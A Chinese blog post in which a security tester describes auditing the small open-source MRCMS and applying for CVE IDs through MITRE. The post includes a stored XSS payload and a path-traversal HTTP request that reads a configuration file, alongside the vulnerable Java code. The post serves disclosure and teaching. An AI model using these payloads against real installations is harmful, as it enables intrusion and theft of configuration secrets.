记录第一次申请CVE编号过程

最新推荐文章于 2024-03-28 11:02:46 发布
最新推荐文章于 2024-03-28 11:02:46 发布
阅读量446 收藏 7
点赞数 4
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18193739/article/details/136780993
版权

目录

文章首发个人公众号

作为一个安服仔突发奇想去申请个CVE编号,大型的CMS代码太多了太复杂,我们就选一些小的CMS的来代码审计获取CVE编号。

漏洞很水,但是自己的首个CVE还是有纪念意义的。

MRCMS: https://gitee.com/marker/MRCMS

存储型xss

代码路径:
\MRCMS\src\main\java\org\marker\mushroom\controller\SystemController.java
在这里插入图片描述
从代码中 syscfg.set 方法写入配置信息,跟进行看看set方法


 /**
  * 设置配置key = val
  * @param key 键
  * @param val 值
  */
 @Override
 public void set(String key, String val) {
  if(val == null){
   val = "";
  }
  this.properties.put(key, val);
 }

set 方法是直接写入内容,没有任意过滤,所以导致xss漏洞产生
在这里插入图片描述
在后台网站描述中添加xss代码

"><img src=1 onerror=alert(/xss/)>

在这里插入图片描述
在这里插入图片描述

任意文件读取漏洞

存在漏洞代码路径 :

MRCMS\src\main\java\org\marker\mushroom\controller\FileController.java

 /**
  * 编辑文本文件
  * @param path
  * @param name
  * @return
  */
 @RequestMapping("/edit")
 public ModelAndView edit(@RequestParam("path") String path, @RequestParam("name") String name){
  ModelAndView view = new ModelAndView(this.viewPath + "edit");
  File file = new File(WebRealPathHolder.REAL_PATH + encoding(path + File.separator + name));
  try {
   view.addObject("data", FileTools.getFileContet(file, FileTools.FILE_CHARACTER_UTF8));
  } catch (IOException e) {
   e.printStackTrace();
  }
  view.addObject("path", encoding(path));
  view.addObject("name", encoding(name));
  return view;
 }

在这里插入图片描述
跟进FileTools.getFileContet方法

 /**
  * 获取文本文件内容
  * @param filePath 文件路径
  * @param character 字符编码
  * @return String 文件文本内容
  * @throws IOException 
  * */
 public static final String getFileContet(File filePath,String character) throws IOException{
  return FileTools.getContent(filePath, character);
 }

在这里插入图片描述
方法中调用了getContent 方法,接着跟进
在这里插入图片描述
从上面分析代码中是直接获取文件内容,并且没有对文件路径进行判断,导致可以跨目录读取文件

在这里插入图片描述请求包

GET /admin/file/edit.do?path=../resources/config.properties&name= HTTP/1.1
Host: 127.0.0.1:8080
Referer: http://127.0.0.1:8080/admin/index.do
Sec-Fetch-Dest: empty
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Sec-Fetch-Mode: cors
X-Requested-With: XMLHttpRequest

编写报告提交CVE

在github上编写漏洞发现过程和给出poc,编写报告一定要用英文写,不然老外看不懂

下面两个是例子,我自己申请的CVE

https://github.com/wy876/cve/issues/1
https://github.com/wy876/cve/issues/2

在这里插入图片描述
提交CVE前,还得去查一下,挖掘的漏洞有没有被提交CVE https://cve.mitre.org/cve/search_cve_list.html
在这里插入图片描述
接着就提交申请

https://cveform.mitre.org/
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

提交后就会收到一封邮件,然后就等待审核分配CVE编号
在这里插入图片描述
差不多一个月就收到CVE编号了
在这里插入图片描述

yr678
关注
  • 4
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
漏洞都是怎么编号CVE/CAN/BUGTRAQ/CNCVE/CNVD/CNNVD
weixin_34112030的博客
11-05 483
在一些文章和报道中常常提到安全漏洞CVE-1999-1046这样的CVE开头的漏洞编号,这篇文章将常见的漏洞ID的表示方法做下介绍: 1、以CVE开头,如CVE-1999-1046这样的      CVE 的英文全称是“Common Vulnerabilities &amp; Exposures”公共漏洞和暴露。CVE就好像是一个字典表,为广泛认同的信息安全漏洞或者已经暴露出来的弱点给...
【工作小知识】CVE漏洞编号
AdamYaoCharlie的博客
02-25 6877
安全办疯狂追杀的日子 各方沟通起来,使用统一的漏洞标准:CVE编号。 【如:国寿集团扫描出来的漏洞、广发内部的漏洞;模管的漏洞 - RTP的漏洞 - CDH集群的漏洞,都可以根据这个编号来对齐,从而讨论问题的节点】 那么CVE编号到底是个啥呢? 一、CVE编号基础: CVE开始是由MITRE Corporation负责日常工作的。但是随着漏洞数量的增加,MITRE将漏洞编号的赋予工作转移到了其CNA(CVE Numbering Authorities)成员。CNA涵盖5类成员。目前共有69家成员单位。 1
CVE申请的那些事
Fly_鹏程万里
07-19 3289
什么是CVE 对于新手来说申请CVE总是摸不清门道,总觉得像这种国际化的高大上漏洞很难申请到,其实则不然,CVE的全称是“Common Vulnerabilities and Exposures”翻译成中文就是“公共漏洞和披露”可以把它理解成一个被安全从业者认可的漏洞字典,大家可以通过编号在这里查找不同应用或系统的漏洞信息。当然很多安全企业或国家机构也都会引用CVE作为其漏洞库,比如美国国家漏洞...
CVE(常见漏洞和公开漏洞)搜索
最新发布
Jingged的博客
03-28 933
CVE编号是指"Common Vulnerabilities and Exposures"(常见漏洞和公开漏洞)编号。它是一个用于唯一标识计算机系统和软件中的已知漏洞的标准化命名方案。CVE编号CVE组织分配给已公开的漏洞,以便安全研究人员、厂商和用户能够准确地引用和讨论特定的漏洞。每个CVE编号由"CVE-"前缀和一个以年份开头的数字序列组成,后面跟着一个连字符和一组数字。例如,"CVE-2021-12345"是一个CVE编号,表示在2021年被发现的第12345个已知漏洞。
「 网络安全常用术语解读 」通用漏洞披露CVE详解
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
03-04 8946
CVE全称是Common Vulnerabilities and Exposures,即通用漏洞披露,它是MITRE公司维护和更新的安全漏洞列表,列表中的每个条目都会有一个唯一的CVE编号,即CVE ID,供安全研究员和受攻击的软件供应商使用,以便确定和回应安全漏洞。CVE条目包含了与CVE ID相关的漏洞的描述性数据(即简要描述和至少一个参考)。当前CVE累计收录了19万+个安全漏洞。
记录一次CVE申请过程
m0_43397796的博客
06-01 3850
跟着网上的教程申请CVE,简单记录一下申请过程
[HACK学习呀] - 2020-11-05 记一次代码审计到申请CVE过程1
08-03
本文以作者的一次亲身经历,分享了从代码审计到申请CVE(Common Vulnerabilities and Exposures,常见漏洞和暴露)的过程,旨在帮助初学者理解并掌握这一过程。 首先,【学习思路】部分强调了自学过程中搜索引擎和...
七龙珠小组第一次会议记录1
08-08
本次“七龙珠小组”的第一次会议,主要议题是关于网络被攻击过程图形化显示系统的讨论。会议于2020年9月8日晚上20点30分在三号学生公寓举行,由汪一帆担任主持人,张明熙负责记录。参与此次会议的成员包括冯蒙博、申...
干货:个人申请CVE的姿势总结.docx
07-06
另一方面,许多工具和产品将CVE作为识别漏洞的标准,使得修复过程更加有序。此外,对于漏洞的追踪和补丁开发,CVE编号也是重要的索引依据。 3. 提交CVE的途径 提交CVE申请主要有两种方式:公开披露和向CNA(CVE ...
cve编号对应漏洞表
06-24
cve 漏洞对应表
iwantacve:套哥代你申请CVE啦!~~~
05-15
中文也能申请CVE 》 ,可以帮助英文不好的小伙伴申请CVE编号哦。 套哥会把自己申请的和带小伙伴申请cve一并统计在这里: CVE-2018-11671:GreenCMS v2.3.0603存在CSRF漏洞可增加管理员账户 CVE-2018-11670:...
小白学安全-漏洞编号的理解 CVE/CAN/BUGTRAQ/CNCVE/CNVD/CNNVD
xqdd的专栏
11-09 2058
CVE就好像是一个字典表,为广泛认同的信息安全漏洞或者已经暴露出来的弱点给出一个公共的名称。假设在一个漏洞报告中指明的一个漏洞,假设有CVE名称,你就能够高速地在不论什么其他CVE兼容的数据库中找到对应修补的信息,解决安全问题。是中国信息安全测评中心为切实履行漏洞分析和风险评估的职能,负责建设运维的国家信息安全漏洞库,为我国信息安全保障提供基础服务。CNCVE就是中国(CN)的CVE,是CNCERT/CC(国家计算机网络应急处理协调中心)为漏洞进行编号的一个自己的标准,即国家计算机网络应急处理协调中心。
漏洞补丁:漏洞命名(CVE和CNNVD)及补丁查找
热门推荐
guyuelin123的博客
10-18 1万+
截图为报告的部分内容,里面包含了编号,描述,解决地址。这里对 CVE编号,CVSS分值,国家漏洞库编号(CNNVD)等几个主要名称含义进行记录
什么是CVECVE漏洞应该如何防护?
m0_66326520的博客
03-25 1720
我们需要采取多重措施来保护服务器的安全性。包括深入分析漏洞、寻找并安装补丁程序、进行安全加固和配置调整,以及加强人员的安全意识和培训。只有通过综合手段加强服务器的安全性,才能有效防范黑客攻击,保护企业网络和数据的安全
常见漏洞编号简介
HDHYCP的博客
08-25 393
这样就使得CVE成为了安全信息共享的“关键字”。如果在⼀个漏洞报告中指明的⼀个漏洞,如 果有CVE名称,你就可以快速地在任何其它CVE兼容的数据库中找到相应修补的信息,解决安全问题。CNCVE就是中国(CN)的CVE,是CNCERT/CC(国家计算机⽹络应急处理协调中⼼)为漏洞进⾏编号的⼀个⾃⼰的标准,即国家 计算机⽹络应急处理协调中⼼(CNCERT/CC)领导下,国内正在组建⾃⼰的CVE组织。“CAN”和“CVE”的唯⼀区别是前者代表了候选条⽬,还未经CVE编辑委员会认可,⽽后者则是经过认可的条⽬。
发现CVE-2018-11512-wityCMS 0.6.1 持久型XSS
xiaoi123的博客
08-09 599
CMS(内容管理系统)很适合被用来做代码审计,尤其是现在CMS系统越来越流行,很多人愿意使用CMS搭建自己的项目。由于大部分CMS是一种开源项目,所以对于CMS的审计属于白盒测试,白盒测试让我们可以发现更多的安全漏洞,而且一旦我们发现了这些漏洞,由于其被广泛使用,所以它的漏洞的影响范围也是呈指数级增长的。这是因为通过白盒测试我们可以查看到程序的内部结构,从而更清楚的理解程序的工作原理。 Wity...
申请CVE的姿势总结
weixin_50464560的博客
07-09 1506
什么是CVECVE的全称叫做“Common Vulnerabilities & Exposures”中文含义是公共漏洞和暴露。它作为披露漏洞的平台,受到国内外关注。CVE会提供编号作为漏洞对应的字符串式特征,有很多企业倾向于用多少高质量的CVE来证明实力,一些工具和产品也会使用CVE作为漏洞的官方标识。一些企业关注漏洞使用CVE作为修补漏洞的索引依据。 如何去提交CVE? 目前经过总结提炼出来多种申请CVE的方法,每种方法都有利弊,请自行选择。大体上分为两种,公开披露和...
聊聊CVE漏洞编号和正式公开那些事
weixin_50464560的博客
07-09 1567
CVE编号获得易,正式公开难!有价值更难!! 获得CVE编号并不等于这个漏洞是有价值的,甚至说这个漏洞都不一定是真实存在的。这主要源于CVE编号颁发机构开放式的工作模式,后面我们会详细介绍。 那么什么样的漏洞是有价值的呢?小编认为最起码要保证原创漏洞的真实可靠和受影响面的广泛度。以绿盟连续五年获得的微软MBB奖励计划为例,其要求原创漏洞必须满足如下指标,包括:漏洞利用必须可靠,且有合理的请求;提交的技术、方法必须新颖,适用于Windows体系的利用远程代码执行漏洞;必须适用于高风险的应用程序,如浏览器或文档
CVE申请过程
weixin_50464560的博客
07-05 3998
CVE申请的那些事在上一篇分享《安全小白面试的那些坑》中和大家提到面试的时候可以在简历中附上提交过的原创漏洞如CVE、CNVD编号等信息,以证明自己在漏洞挖掘方面的技术经验和能力。本文将和大家分享申请CVE的方法和技巧。什么是CVE对于新手来说申请CVE总是摸不清门道,总觉得像这种国际化的高大上漏洞很难申请到,其实则不然,CVE的全称是“Common Vulnerabilities and Exposures”翻译成中文就是“公共漏洞和披露”可以把它理解成一个被安全从业者认可的漏洞字典,大家可以通过编号在这
从代码审计到CVE申请:一次PHP安全实践分享
这篇文章主要是一位学员分享了从进行代码审计到成功申请CVE(Common Vulnerabilities and Exposures,常见漏洞和暴露)的过程,旨在为自学网络安全的朋友提供一些学习思路和方法。作者首先强调了自学过程中遇到的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yr678

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值